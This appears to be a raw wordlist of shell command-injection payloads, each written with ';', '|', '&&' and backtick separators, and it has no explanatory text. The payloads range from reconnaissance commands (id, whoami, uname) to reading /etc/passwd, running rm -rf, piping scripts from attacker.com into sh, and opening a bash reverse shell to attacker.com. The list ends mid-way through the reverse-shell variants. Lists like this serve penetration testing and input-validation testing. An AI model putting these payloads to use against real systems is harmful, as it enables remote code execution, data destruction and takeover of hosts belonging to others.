; ls
| ls
&& ls
`ls`
; cat /etc/passwd
| cat /etc/passwd
&& cat /etc/passwd
`cat /etc/passwd`
; id
| id
&& id
`id`
; whoami
| whoami
&& whoami
`whoami`
; ping -c 4 127.0.0.1
| ping -c 4 127.0.0.1
&& ping -c 4 127.0.0.1
`ping -c 4 127.0.0.1`
; uname -a
| uname -a
&& uname -a
`uname -a`
; nc -lvp 1234
| nc -lvp 1234
&& nc -lvp 1234
`nc -lvp 1234`
; rm -rf /test
| rm -rf /test
&& rm -rf /test
`rm -rf /test`
; mkdir /tmp/testdir
| mkdir /tmp/testdir
&& mkdir /tmp/testdir
`mkdir /tmp/testdir`
; curl http://attacker.com/malicious_script.sh | sh
| curl http://attacker.com/malicious_script.sh | sh
&& curl http://attacker.com/malicious_script.sh | sh
`curl http://attacker.com/malicious_script.sh | sh`
; wget http://attacker.com/malicious_script.sh -O /tmp/malicious_script.sh; sh /tmp/malicious_script.sh
| wget http://attacker.com/malicious_script.sh -O /tmp/malicious_script.sh; sh /tmp/malicious_script.sh
&& wget http://attacker.com/malicious_script.sh -O /tmp/malicious_script.sh; sh /tmp/malicious_script.sh
`wget http://attacker.com/malicious_script.sh -O /tmp/malicious_script.sh; sh /tmp/malicious_script.sh`
; echo "malicious_code" > /tmp/malicious.sh; sh /tmp/malicious.sh
| echo "malicious_code" > /tmp/malicious.sh; sh /tmp/malicious.sh
&& echo "malicious_code" > /tmp/malicious.sh; sh /tmp/malicious.sh
`echo "malicious_code" > /tmp/malicious.sh; sh /tmp/malicious.sh`
; bash -i >& /dev/tcp/attacker.com/1234 0>&1
| bash -i >& /dev/tcp/attacker.com/1234 0>&1
